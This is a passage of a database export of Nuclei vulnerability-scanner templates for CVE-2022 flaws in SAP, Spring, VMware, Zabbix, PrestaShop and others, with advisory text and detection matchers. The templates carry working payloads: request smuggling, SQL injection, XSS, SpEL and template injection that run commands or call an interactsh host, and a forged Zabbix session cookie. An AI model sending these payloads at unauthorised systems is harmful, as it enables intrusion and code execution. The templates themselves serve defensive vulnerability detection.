provided by SAP to mitigate this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2022-22536\n - https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022\n - https://github.com/Onapsis/onapsis_icmad_scanner\n - https://blogs.sap.com/2022/02/11/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation-in-sap-netweaver-sap-content-server-and-sap-web-dispatcher/\n - https://launchpad.support.sap.com/#/notes/3123396\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cve-id: CVE-2022-22536\n cwe-id: CWE-444\n epss-score: 0.96507\n epss-percentile: 0.99572\n cpe: cpe:2.3:a:sap:content_server:7.53:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: sap\n product: content_server\n shodan-query: http.favicon.hash:-266008933\n tags: cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes,kev\n\nhttp:\n - raw:\n - |+\n GET {{sap_path}} HTTP/1.1\n Host: {{Hostname}}\n Content-Length: 82646\n Connection: keep-alive\n\n {{repeat(\"A\", 82642)}}\n\n GET / HTTP/1.1\n Host: {{Hostname}}\n\n payloads:\n sap_path:\n # based on https://github.com/Onapsis/onapsis_icmad_scanner\n - /sap/admin/public/default.html\n - /sap/public/bc/ur/Login/assets/corbu/sap_logo.png\n stop-at-first-match: true\n unsafe: true\n read-all: true\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - \"contains(tolower(body), 'administration')\"\n - \"contains(tolower(header), 'content-type: image/png')\"\n condition: or\n\n - type: word\n part: body\n words:\n - \"HTTP/1.0 400 Bad Request\" # error in concatenated response\n - \"HTTP/1.0 500 Internal Server Error\"\n - \"HTTP/1.0 500 Dispatching Error\"\n condition: or\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220625e735423251591072249e5f4c141a534b0b1abf0e798f02463087caee9f42c022100a73cdb01bbb0719b01521f92e0e2542f481efa8d92ad61f31787a51cf819d1a2:922c64590222798bb761d5b6d8e72950", "hash": "39d285bcc4e17a5778251c6960335da4", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30849a" }, "name": "CVE-2022-22733.yaml", "content": "id: CVE-2022-22733\n\ninfo:\n name: Apache ShardingSphere ElasticJob-UI privilege escalation\n author: Zeyad Azima\n severity: medium\n description: |\n Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has guest account to do privilege escalation. This issue affects Apache ShardingSphere ElasticJob-UI Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions.\n impact: |\n Successful exploitation of this vulnerability could result in unauthorized access and control of the ElasticJob-UI application.\n remediation: |\n Apply the latest security patches or updates provided by Apache ShardingSphere to mitigate the privilege escalation vulnerability.\n reference:\n - https://www.vicarius.io/vsociety/blog/cve-2022-22733-apache-shardingsphere-elasticjob-ui-privilege-escalation\n - https://nvd.nist.gov/vuln/detail/CVE-2022-22733\n - https://lists.apache.org/thread/qpdsm936n9bhksb0rzn6bq1h7ord2nm6\n - http://www.openwall.com/lists/oss-security/2022/01/20/2\n - https://github.com/Zeyad-Azima/CVE-2022-22733\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2022-22733\n cwe-id: CWE-200\n epss-score: 0.12656\n epss-percentile: 0.95328\n cpe: cpe:2.3:a:apache:shardingsphere_elasticjob-ui:3.0.0:-:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: apache\n product: shardingsphere_elasticjob-ui\n shodan-query: http.favicon.hash:816588900\n tags: cve2022,cve,exposure,sharingsphere,apache\n\nhttp:\n - raw:\n - |\n POST /api/login HTTP/1.1\n Host: {{Hostname}}\n Accept: application/json, text/plain, */*\n Access-Token:\n Content-Type: application/json;charset=UTF-8\n Origin: {{RootURL}}\n Referer: {{RootURL}}\n\n {\"username\":\"guest\",\"password\":\"guest\"}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"success\":true'\n - '\"isGuest\":true'\n - '\"accessToken\":'\n condition: and\n\n - type: word\n part: header\n words:\n - application/json\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100f6af293cbdd4986d1af6b7b77c096113f537236e7ea53a74d1723cc59ef0491f02204739dd5828b2f03b95cb3d91c20c90771e760b69a978c0572704cdc1feb82038:922c64590222798bb761d5b6d8e72950", "hash": "126a3f27bb5b4c5b4d27f7600f5180c3", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30849b" }, "name": "CVE-2022-22897.yaml", "content": "id: CVE-2022-22897\n\ninfo:\n name: PrestaShop Ap Pagebuilder <= 2.4.4 SQL Injection\n author: mastercho\n severity: critical\n description: |\n A SQL injection vulnerability in the product_all_one_img and image_product parameters of the ApolloTheme AP PageBuilder component through 2.4.4 for PrestaShop allows unauthenticated attackers to exfiltrate database data.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.\n remediation: |\n Upgrade PrestaShop Ap Pagebuilder to version 2.4.5 or later to mitigate this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2022-22897\n - https://packetstormsecurity.com/files/cve/CVE-2022-22897\n - https://security.friendsofpresta.org/modules/2023/01/05/appagebuilder.html\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/karimhabush/cyberowl\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-22897\n cwe-id: CWE-89\n epss-score: 0.04685\n epss-percentile: 0.91818\n cpe: cpe:2.3:a:apollotheme:ap_pagebuilder:*:*:*:*:*:prestashop:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: apollotheme\n product: ap_pagebuilder\n framework: prestashop\n shodan-query: http.component:\"Prestashop\"\n tags: cve,cve2022,packetstorm,prestashop,sqli,unauth,apollotheme\n\nhttp:\n - raw:\n - |\n POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Referer: {{RootURL}}\n X-Requested-With: XMLHttpRequest\n\n leoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0)\n - |\n GET /modules/appagebuilder/config.xml HTTP/1.1\n Host: {{Hostname}}\n\n extractors:\n - type: regex\n name: version\n part: body_2\n internal: true\n group: 1\n regex:\n - \"\\\\s*\\\\s*<\\\\/version>\"\n matchers:\n - type: dsl\n dsl:\n - 'duration_1>=6'\n - 'status_code_2 == 200 && compare_versions(version, \"<= 2.4.4\")'\n condition: and\n# digest: 4a0a00473045022029319142054ee6f0ddb0bc16189b4c16e59004c93276cc82b97b27cc4d5a5efb022100bc6b21b2081ff6e7b7e7e71fab33e9484dfe3b6239cc8b11961d4ad845db15c1:922c64590222798bb761d5b6d8e72950", "hash": "83edde95635f070f84f72e5f5f95d96e", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30849c" }, "name": "CVE-2022-2290.yaml", "content": "id: CVE-2022-2290\n\ninfo:\n name: Trilium <0.52.4 - Cross-Site Scripting\n author: dbrwsky\n severity: medium\n description: Trilium prior to 0.52.4, 0.53.1-beta contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected Trilium instance.\n remediation: |\n Upgrade Trilium to version 0.52.4 or later, which includes proper input sanitization to mitigate the XSS vulnerability.\n reference:\n - https://huntr.dev/bounties/367c5c8d-ad6f-46be-8503-06648ecf09cf/\n - https://github.com/zadam/trilium\n - https://github.com/zadam/trilium/commit/3faae63b849a1fabc31b823bb7af3a84d32256a7\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2290\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-2290\n cwe-id: CWE-79\n epss-score: 0.001\n epss-percentile: 0.40139\n cpe: cpe:2.3:a:trilium_project:trilium:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: trilium_project\n product: trilium\n shodan-query: title:\"Trilium Notes\"\n tags: cve,cve2022,xss,trilium,huntr,trilium_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/custom/%3Cimg%20src=x%20onerror=alert(document.domain)%3E'\n - '{{BaseURL}}/share/api/notes/%3Cimg%20src=x%20onerror=alert(document.domain)%3E'\n - '{{BaseURL}}/share/api/images/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/filename'\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"No handler matched for custom \"\n - \"Note '' not found\"\n condition: or\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 404\n# digest: 4a0a004730450221009f17fcdc98badc0464257c420fab598e7343e41d66382b910b98fd7005d968a0022040758dbc4500b3ca9aaa3096213583ee7175eb34c798a02991e0af55731a6641:922c64590222798bb761d5b6d8e72950", "hash": "728bd4f54786a669d9f47ec3ae6792fa", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30849d" }, "name": "CVE-2022-22947.yaml", "content": "id: CVE-2022-22947\n\ninfo:\n name: Spring Cloud Gateway Code Injection\n author: pdteam\n severity: critical\n description: Applications using Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.\n impact: |\n Successful exploitation of this vulnerability could lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system.\n remediation: |\n Apply the latest security patches provided by the vendor and ensure proper input validation to prevent code injection attacks.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2022-22947\n - https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/\n - https://github.com/wdahlenburg/spring-gateway-demo\n - https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published\n - https://tanzu.vmware.com/security/cve-2022-22947\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cve-id: CVE-2022-22947\n cwe-id: CWE-917,CWE-94\n epss-score: 0.97494\n epss-percentile: 0.99975\n cpe: cpe:2.3:a:vmware:spring_cloud_gateway:*:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n vendor: vmware\n product: spring_cloud_gateway\n tags: cve,cve2022,apache,spring,vmware,actuator,oast,kev\n\nhttp:\n - raw:\n - |\n POST /actuator/gateway/routes/{{randstr}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\n \"predicates\": [\n {\n \"name\": \"Path\",\n \"args\": {\n \"_genkey_0\": \"/{{randstr}}/**\"\n }\n }\n ],\n \"filters\": [\n {\n \"name\": \"RewritePath\",\n \"args\": {\n \"_genkey_0\": \"#{T(java.net.InetAddress).getByName(\\\"{{interactsh-url}}\\\")}\",\n \"_genkey_1\": \"/${path}\"\n }\n }\n ],\n \"uri\": \"{{RootURL}}\",\n \"order\": 0\n }\n - |\n POST /actuator/gateway/refresh HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\n \"predicate\": \"Paths: [/{{randstr}}], match trailing slash: true\",\n \"route_id\": \"{{randstr}}\",\n \"filters\": [\n \"[[RewritePath #{T(java.net.InetAddress).getByName(\\\"{{interactsh-url}}\\\")} = /${path}], order = 1]\"\n ],\n \"uri\": \"{{RootURL}}\",\n \"order\": 0\n }\n - |\n DELETE /actuator/gateway/routes/{{randstr}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"/routes/{{randstr}}\"\n\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n\n - type: status\n status:\n - 201\n# digest: 4a0a00473045022010d84f2620ab416e19b190fa0906b396e1ed468adf0f7c479ba08e59807460a0022100b8906cae8b222b3a356af5d1e9c9ec9f43db3d2312c0d00d4a8a9befc8db6ef2:922c64590222798bb761d5b6d8e72950", "hash": "8c96775be95ab736dea995f26d38a54a", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30849e" }, "name": "CVE-2022-22954.yaml", "content": "id: CVE-2022-22954\n\ninfo:\n name: VMware Workspace ONE Access - Server-Side Template Injection\n author: sherlocksecurity\n severity: critical\n description: |\n VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager.\n impact: |\n Successful exploitation of this vulnerability could lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system.\n remediation: |\n Apply the latest security patches provided by VMware to mitigate this vulnerability.\n reference:\n - https://www.tenable.com/blog/vmware-patches-multiple-vulnerabilities-in-workspace-one-vmsa-2022-0011\n - https://www.vmware.com/security/advisories/VMSA-2022-0011.html\n - http://packetstormsecurity.com/files/166935/VMware-Workspace-ONE-Access-Template-Injection-Command-Execution.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-22954\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-22954\n cwe-id: CWE-94\n epss-score: 0.97348\n epss-percentile: 0.99878\n cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: vmware\n product: identity_manager\n shodan-query: http.favicon.hash:-1250474341\n tags: cve2022,cve,workspaceone,kev,tenable,packetstorm,vmware,ssti\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Authorization context is not valid\"\n\n - type: status\n status:\n - 400\n# digest: 4a0a00473045022100d526962a39ddb96c782fb1b73127f860969e804b9df4fb0e992d34f58b0f8a970220594f3e21afff5d99b6ea0023e8d7fd5b96f238f8b48d7c5de5b4269733b91906:922c64590222798bb761d5b6d8e72950", "hash": "6189ce67178263e39277dd0afba06465", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30849f" }, "name": "CVE-2022-22963.yaml", "content": "id: CVE-2022-22963\n\ninfo:\n name: Spring Cloud - Remote Code Execution\n author: Mr-xn,Adam Crosser\n severity: critical\n description: |\n Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches provided by the Spring Cloud project to mitigate this vulnerability.\n reference:\n - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f\n - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE\n - https://tanzu.vmware.com/security/cve-2022-22963\n - https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/\n - https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection\n - https://nvd.nist.gov/vuln/detail/CVE-2022-22963\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-22963\n cwe-id: CWE-94,CWE-917\n epss-score: 0.97537\n epss-percentile: 0.99993\n cpe: cpe:2.3:a:vmware:spring_cloud_function:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: vmware\n product: spring_cloud_function\n tags: cve,cve2022,vulhub,springcloud,rce,kev,vmware\n\nhttp:\n - raw:\n - |\n POST /functionRouter HTTP/1.1\n Host: {{Hostname}}\n spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")\n Content-Type: application/x-www-form-urlencoded\n\n {{rand_base(8)}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n - \"dns\"\n condition: or\n\n - type: status\n status:\n - 500\n# digest: 490a0046304402205d6843e61f79f6f923c45f295fdbd23eb8553580f133f3595140c997e398c304022032df92fd24048679c909836db50aeef2682dfff4b5c6e8a8e844e32c0a7de57e:922c64590222798bb761d5b6d8e72950", "hash": "3dcd68ffdfdc491aa4b2b353e31d81c3", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084a0" }, "name": "CVE-2022-22965.yaml", "content": "id: CVE-2022-22965\n\ninfo:\n name: Spring - Remote Code Execution\n author: justmumu,arall,dhiyaneshDK,akincibor\n severity: critical\n description: |\n Spring MVC and Spring WebFlux applications running on Java Development Kit 9+ are susceptible to remote code execution via data binding. It requires the application to run on Tomcat as a WAR deployment. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to this exploit.\n reference:\n - https://tanzu.vmware.com/security/cve-2022-22965\n - https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/\n - https://twitter.com/RandoriAttack/status/1509298490106593283\n - https://mp.weixin.qq.com/s/kgw-O4Hsd9r2vfme3Y2Ynw\n - https://twitter.com/_0xf4n9x_/status/1509935429365100546\n - https://nvd.nist.gov/vuln/detail/cve-2022-22965\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-22965\n cwe-id: CWE-94\n epss-score: 0.97493\n epss-percentile: 0.99972\n cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*\n metadata:\n max-request: 4\n vendor: vmware\n product: spring_framework\n tags: cve2022,cve,rce,spring,injection,oast,intrusive,kev,vmware\n\nhttp:\n - raw:\n - |\n POST {{BaseURL}} HTTP/1.1\n Content-Type: application/x-www-form-urlencoded\n\n class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx\n - |\n GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1\n\n payloads:\n interact_protocol:\n - \"http\"\n - https\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: Java\"\n case-insensitive: true\n# digest: 4b0a00483046022100bab8cdd853737b59319b38f4bee9f7caa33da5df53d776fd392da693df12fe4c0221009da74a2a2b55cffc468b0567927c7f7e1beec337f6f1827b8ed42e5ae792ffd1:922c64590222798bb761d5b6d8e72950", "hash": "fbafe34b40b62c7947d29ad1ecf2a6df", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084a1" }, "name": "CVE-2022-22972.yaml", "content": "id: CVE-2022-22972\n\ninfo:\n name: VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass\n author: For3stCo1d,princechaddha\n severity: critical\n description: |\n VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the affected system.\n remediation: |\n Apply the latest security patches or updates provided by VMware to fix the authentication bypass vulnerability (CVE-2022-22972).\n reference:\n - https://github.com/horizon3ai/CVE-2022-22972\n - https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive\n - https://www.vmware.com/security/advisories/VMSA-2022-0014.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-22972\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-22972\n cwe-id: CWE-287\n epss-score: 0.7146\n epss-percentile: 0.9778\n cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n vendor: vmware\n product: identity_manager\n fofa-query: app=\"vmware-Workspace-ONE-Access\" || app=\"vmware-Identity-Manager\" || app=\"vmware-vRealize\"\n tags: cve2022,cve,vmware,auth-bypass,oast\n\nhttp:\n - raw:\n - |\n GET /vcac/ HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1\n Host: {{interactsh-url}}\n Content-type: application/x-www-form-urlencoded\n\n protected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in\n\n host-redirects: true\n max-redirects: 3\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"HZN=\"\n\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: status\n status:\n - 302\n\n extractors:\n - type: regex\n name: protected_state\n group: 1\n regex:\n - 'id=\"protected_state\" value=\"([a-zA-Z0-9]+)\"\\/>'\n internal: true\n part: body\n\n - type: regex\n name: horizonRelayState\n group: 1\n regex:\n - 'name=\"horizonRelayState\" value=\"([a-z0-9-]+)\"\\/>'\n internal: true\n part: body\n\n - type: regex\n name: userstore\n group: 1\n regex:\n - 'id=\"userstore\" value=\"([a-z.]+)\" \\/>'\n internal: true\n part: body\n\n - type: regex\n name: userstoreDisplay\n group: 1\n regex:\n - 'id=\"userstoreDisplay\" readonly class=\"login-input transparent_class\" value=\"(.*)\"/>'\n internal: true\n part: body\n\n - type: regex\n name: stickyConnectorId\n group: 1\n regex:\n - 'name=\"stickyConnectorId\" value=\"(.*)\"/>'\n internal: true\n part: body\n\n - type: kval\n name: HZN-Cookie\n kval:\n - 'HZN'\n part: header\n# digest: 4a0a0047304502206403cd0d279ad3059877b01e431f357ec5373c9854c2ff5cbe853a8ac65ef39c022100d9069fe039d74cbcad2eb0f8ef4724af0436462068f8baecdb321328ac7a89af:922c64590222798bb761d5b6d8e72950", "hash": "9480c43b6d9ddda21fc9d42850f84f3a", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084a2" }, "name": "CVE-2022-23102.yaml", "content": "id: CVE-2022-23102\n\ninfo:\n name: SINEMA Remote Connect Server < V2.0 - Open Redirect\n author: ctflearner,ritikchaddha\n severity: medium\n description: |\n A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V2.0). Affected products contain an open redirect vulnerability. An attacker could trick a valid authenticated user to the device into clicking a malicious link there by leading to phishing attacks.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks.\n remediation: |\n Upgrade to SINEMA Remote Connect Server version 2.0 or later to fix the open redirect vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/cve-2022-23102\n - https://packetstormsecurity.com/files/165966/SIEMENS-SINEMA-Remote-Connect-1.0-SP3-HF1-Open-Redirection.html\n - https://seclists.org/fulldisclosure/2022/Feb/20\n - https://cert-portal.siemens.com/productcert/pdf/ssa-654775.pdf\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-23102\n cwe-id: CWE-601\n epss-score: 0.00366\n epss-percentile: 0.71925\n cpe: cpe:2.3:a:siemens:sinema_remote_connect_server:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: siemens\n product: sinema_remote_connect_server\n shodan-query: title:\"Logon - SINEMA Remote Connect\"\n tags: cve,cve2022,packetstorm,seclists,redirect,sinema,authenticated,siemens\n\nhttp:\n - raw:\n - |\n GET /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: csrftoken={{csrf}};\n Referer: {{RootURL}}/wbm/login/?next=https%3A%2F%2Finteract.sh\n\n csrfmiddlewaretoken={{csrf}}&utcoffset=330&username={{username}}&password={{password}}\n\n matchers:\n - type: regex\n part: header_2\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$'\n\n extractors:\n - type: regex\n name: csrf\n part: body\n group: 1\n regex:\n - \"name='csrfmiddlewaretoken' value='(.*)' />\"\n internal: true\n# digest: 490a0046304402203cad78aaff543175f5e30153ca01cb6d6a88448ec822dc9559ed8b13434d6e9c022002833237d916abd0bcc7d2263671711bfe6b01b5fdaf5564e962070a75d71045:922c64590222798bb761d5b6d8e72950", "hash": "4cd9ccf7682c7908a55743656b756a96", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084a3" }, "name": "CVE-2022-23131.yaml", "content": "id: CVE-2022-23131\n\ninfo:\n name: Zabbix - SAML SSO Authentication Bypass\n author: For3stCo1d,spac3wh1te\n severity: critical\n description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Zabbix monitoring system.\n remediation: Upgrade to 5.4.9rc2, 6.0.0beta1, 6.0 (plan) or higher.\n reference:\n - https://support.zabbix.com/browse/ZBX-20350\n - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage\n - https://nvd.nist.gov/vuln/detail/CVE-2022-23131\n - https://github.com/1mxml/CVE-2022-23131\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-23131\n cwe-id: CWE-290\n epss-score: 0.96952\n epss-percentile: 0.9967\n cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: zabbix\n product: zabbix\n shodan-query: http.favicon.hash:892542951\n fofa-query: app=\"ZABBIX-监控系统\" && body=\"saml\"\n tags: cve,cve2022,zabbix,auth-bypass,saml,sso,kev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/zabbix/index_sso.php\"\n - \"{{BaseURL}}/index_sso.php\"\n\n stop-at-first-match: true\n\n headers:\n Cookie: \"zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9\"\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - \"contains(tolower(header), 'location: zabbix.php?action=dashboard.view')\"\n\n - type: status\n status:\n - 302\n# digest: 490a0046304402205a1b293df8b7aed723300bcf514a562944a5b7526bc1d6567e5629fb5dcdeb4102201e42210613038aa5ab1f2efe25c521bab18fa8617d682b250c5261c0630a53d5:922c64590222798bb761d5b6d8e72950", "hash": "247054e76e22dbc505a7fd66ffcf8ff5", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084a4" }, "name": "CVE-2022-23134.yaml", "content": "id: CVE-2022-23134\n\ninfo:\n name: Zabbix Setup Configuration Authentication Bypass\n author: bananabr\n severity: medium\n description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Zabbix setup configuration.\n remediation: |\n Apply the latest security patches or updates provided by Zabbix to fix the authentication bypass vulnerability.\n reference:\n - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage\n - https://nvd.nist.gov/vuln/detail/CVE-2022-23134\n - https://support.zabbix.com/browse/ZBX-20384\n - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6SZYHXINBKCY42ITFSNCYE7KCSF33VRA/\n - https://lists.debian.org/debian-lts-announce/2022/02/msg00008.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\n cvss-score: 5.3\n cve-id: CVE-2022-23134\n cwe-id: CWE-287,CWE-284\n 